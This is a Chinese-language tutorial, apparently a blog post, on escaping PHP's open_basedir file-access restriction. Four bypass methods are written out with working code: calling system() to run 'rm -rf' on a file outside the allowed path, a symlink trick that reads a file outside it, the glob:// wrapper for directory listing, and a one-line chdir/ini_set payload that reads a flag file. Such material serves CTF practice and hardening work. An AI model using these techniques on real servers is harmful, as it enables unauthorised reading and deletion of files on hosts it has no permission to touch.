php繞過open_basedir設置

原理
關於open_basedir
    open_basedir是php.ini中的一個配置選項
    它可將用戶訪問文件的活動范圍限制在指定的區域，
    假設open_basedir=/home/wwwroot/home/web1/:/tmp/，那么通過web1訪問服務器的用戶就無法獲取服務器上除了/home/wwwroot/home/web1/和/tmp/這兩個目錄以外的文件。
    注意用open_basedir指定的限制實際上是前綴,而不是目錄名。
    舉例來說: 若"open_basedir = /dir/user", 那么目錄 "/dir/user" 和 "/dir/user1"都是可以訪問的。所以如果要將訪問限制在僅為指定的目錄，請用斜線結束路徑名。
補充:
    ①如果php.ini配置項前有分號，表明php.ini中沒有該設置。那就很可能是在  php-fpm  中的 fastcgi.conf中配置了。php-fpm中的配置會覆蓋php.ini的配置。
    ②在php.ini或者fastcgi.cong中設置，都是針對所有項目。如果想要對單獨項目進行設置的話，在項目根目錄中通過  .user.ini 進行配置。
    .user.ini配置
    首先，要使.user.ini生效，要設置php.ini 中的
        user_ini.filename = ".user.ini"
        user_ini.cache_ttl = 300
    注釋掉 fastcgi.conf 中的 open_basedir  的配置。
    在項目根目錄 創建 .user.ini文件，寫入如下內容
         open_basedir=/tmp/:/proc/:/you_web_path
    重啟一下php-fpm 服務即可。
關於符號鏈接
    符號鏈接又叫軟鏈接,是一類特殊的文件，這個文件包含了另一個文件的路徑名(絕對路徑或者相對路徑)。
    路徑可以是任意文件或目錄，可以鏈接不同文件系統的文件。在對符號文件進行讀或寫操作的時候，系統會自動把該操作轉換為對源文件的操作，但刪除鏈接文件時，系統僅僅刪除鏈接文件，而不刪除源文件本身。

0x01 繞過方式1system命令執行函數
由於open_basedir的設置對system等命令執行函數是無效的，所以我們可以使用命令執行函數來訪問限制目錄。
我們首先創建一個目錄
    /home/puret/test/
且在該目錄下新建一個1.txt 內容為abc
    nano 1.txt
再在該目錄下創建一個目錄命名為b
    mkdir b
並且在該目錄下創建一個1.php文件內容為
    <?php
      echo file_get_contents("../1.txt");
    ?>
且在php.ini中設置好我們的open_basedir
    open_basedir = /home/puret/test/b/
我們嘗試執行1.php看看open_basedir是否會限制我們的訪問
執行效果如圖
很明顯我們無法直接讀取open_basedir所規定以外的目錄文件。
接下來我們用system函數嘗試繞open_basedir的限制來刪除1.txt
編輯1.php為
    <?php
     system("rm -rf ../1.txt");
    ?>
先來看看執行1.php之前的文件情況
執行1.php之后
成功通過命令執行函數繞過open_basedir來刪除文件。
由於命令執行函數一般都會被限制在disable_function當中，所以我們需要尋找其他的途徑來繞過限制。

0x02 繞過方式2symlink()函數
我們先來了解一下symlink函數
    bool symlink ( string $target , string $link )
symlink函數將建立一個指向target的名為link的符號鏈接，當然一般情況下這個target是受限於open_basedir的。
由於早期的symlink不支持windows，我的測試環境就放在Linux下了。
測試的PHP版本是5.3.0，其他的版本大家自測吧。
在Linux環境下我們可以通過symlink完成一些邏輯上的繞過導致可以跨目錄操作文件。
我們首先在/var/www/html/1.php中 編輯1.php的內容為
    <?php
      mkdir("c");   //創建目錄
      chdir("c");     //改變目錄
      mkdir("d");
      chdir("d");
      chdir("..");  
      chdir("..");
      symlink("c/d","tmplink");
      symlink("tmplink/../../1.txt","exploit");
      unlink("tmplink");
      mkdir("tmplink");
      echo file_put_contents("http://127.0.0.1/exploit");
    ?>
接着在/var/www/中新建一個1.txt文件內容為
    "abc"
再來設置一下我們的open_basedir
    open_basedir = /var/www/html/
在html目錄下編輯一個php腳本檢驗一下open_basedir
    <?php
       file_get_contents("../1.txt");
    ?>
執行看下。
意料之中，文件無法訪問。
我們執行剛才寫好的腳本，1.php
可以看到成功讀取到了1.txt的文件內容，逃脫了open_basedir的限制
問題的關鍵就在於
    symlink("tmplink/../../1.txt","exploit");
此時tmplink還是一個符號鏈接文件，它指向的路徑是c/d，因此exploit指向的路徑就變成了
    c/d/../../1.txt
由於這個路徑在open_basedir的范圍之內所以exploit成功建立了。
之后我們刪除tmplink符號鏈接文件再新建一個同名為tmplink的文件夾，這時exploit所指向的路徑為
    tmplink/../../
由於這時候tmplink變成了一個真實存在的文件夾所以tmplink/../../變成了1.txt所在的目錄即/var/www/
然后再通過訪問符號鏈接文件exploit即可直接讀取到1.txt的文件內容
當然，針對symlink()只需要將它放入disable_function即可解決問題，所以我們需要尋求更多的方法。

0x03 繞過方式3glob偽協議
glob是php自5.3.0版本起開始生效的一個用來篩選目錄的偽協議，由於它在篩選目錄時是不受open_basedir的制約的，所以我們可以利用它來繞過限制，我們新建一個目錄在/var/www/下命名為test
並且在/var/www/html/下新建t.php內容為
    <?php
      $a = "glob:///var/www/test/*.txt";
      if ( $b = opendir($a) ) {
        while ( ($file = readdir($b)) !== false ) {
          echo "filename:".$file."\n";
        }
        closedir($b);
      }
    ?>
執行結果如圖：
成功躲過open_basedir的限制讀取到了文件。

0x04 繞過方式4根據源碼邏輯
博客https://xz.aliyun.com/t/4720
Payload:
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));